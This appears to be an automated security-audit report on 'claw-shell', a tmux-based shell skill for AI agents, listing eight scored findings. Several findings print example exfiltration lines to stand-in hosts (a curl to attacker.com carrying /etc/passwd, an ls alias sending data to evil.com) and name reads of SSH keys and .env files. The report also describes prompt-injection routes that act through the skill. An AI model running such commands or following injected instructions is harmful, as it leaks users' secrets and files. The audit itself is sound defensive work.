Is claw-shell safe?

https://clawhub.ai/imaginelogo/claw-shell

52
CAUTION

claw-shell is a tmux-based shell execution skill that provides the agent with effectively unrestricted command-line access. While the skill itself contains no malicious code, its isDangerous() safeguard is trivially bypassable and covers only 7 keywords. The skill has no sandboxing, no file access restrictions, no network egress controls, and insufficient command escaping — making it a powerful execution primitive for any attack chain. Installation was clean with no malicious clone behavior detected.

Category Scores

Prompt Injection 75/100 · 30%
Data Exfiltration 45/100 · 25%
Code Execution 20/100 · 20%
Clone Behavior 80/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 25/100 · 5%

Findings (8)

CRITICAL Unrestricted arbitrary shell command execution -60

handler.js executes any command passed to it via execSync through tmux with no sandboxing, no allowlist, and no directory restrictions. The isDangerous() blocklist checks only 7 keywords and is trivially bypassable. This gives the agent — and anything that can influence the agent's input — full shell access.

HIGH Insufficient command escaping enables injection -20

The sendCommand() function only escapes double quotes in the command string. Shell metacharacters like $(), backticks, semicolons, pipes (|), and logical operators (&&, ||) pass through unmodified. An attacker who can influence the command parameter can chain arbitrary commands.

HIGH No restrictions on reading sensitive files or exfiltrating data -55

The skill places no restrictions on which files can be read or where data can be sent. Commands like 'cat ~/.ssh/id_rsa', 'cat .env', or 'curl https://attacker.com/?d=$(cat /etc/passwd)' are not blocked by the isDangerous() check. Any data read flows back through tmux capture-pane into the agent context.

MEDIUM Example normalizes arbitrary URL fetching via shell -15

The EXAMPLES section includes 'bird read https://x.com/...' as a SAFE example, training the agent to accept fetching arbitrary URLs through the shell as normal behavior. This could be leveraged by prompt injection in other skills to exfiltrate data via URL parameters.

MEDIUM ALL-CAPS imperative directives condition agent behavior -10

SKILL.md uses aggressive ALL-CAPS formatting (ALWAYS, NEVER, DO NOT RUN) which, while within scope, conditions the agent to treat the skill's instructions as high-priority overrides. This styling pattern can make the agent more susceptible to similar formatting in attacker-controlled content.

MEDIUM Persistent tmux session enables cross-invocation state attacks -25

The tmux session 'claw' persists across skill invocations. An attacker could set shell aliases, environment variables, or background processes in one invocation that activate in later invocations. For example: alias ls='ls; curl https://evil.com/?pwd=$(pwd)' would silently exfiltrate on every subsequent ls call.

LOW Fixed 500ms delay creates race condition -5

The handler waits a fixed 500ms before reading tmux output. Commands that take longer will return stale output, potentially causing the agent to misinterpret results, retry commands, or take incorrect follow-up actions.

INFO SSH host key reads are from sshd, not skill -5

Filesystem monitoring captured reads of /etc/ssh/ssh_host_*_key files. These are from the sshd process handling the SSH connection used for installation, not from the skill itself. This is expected VM behavior.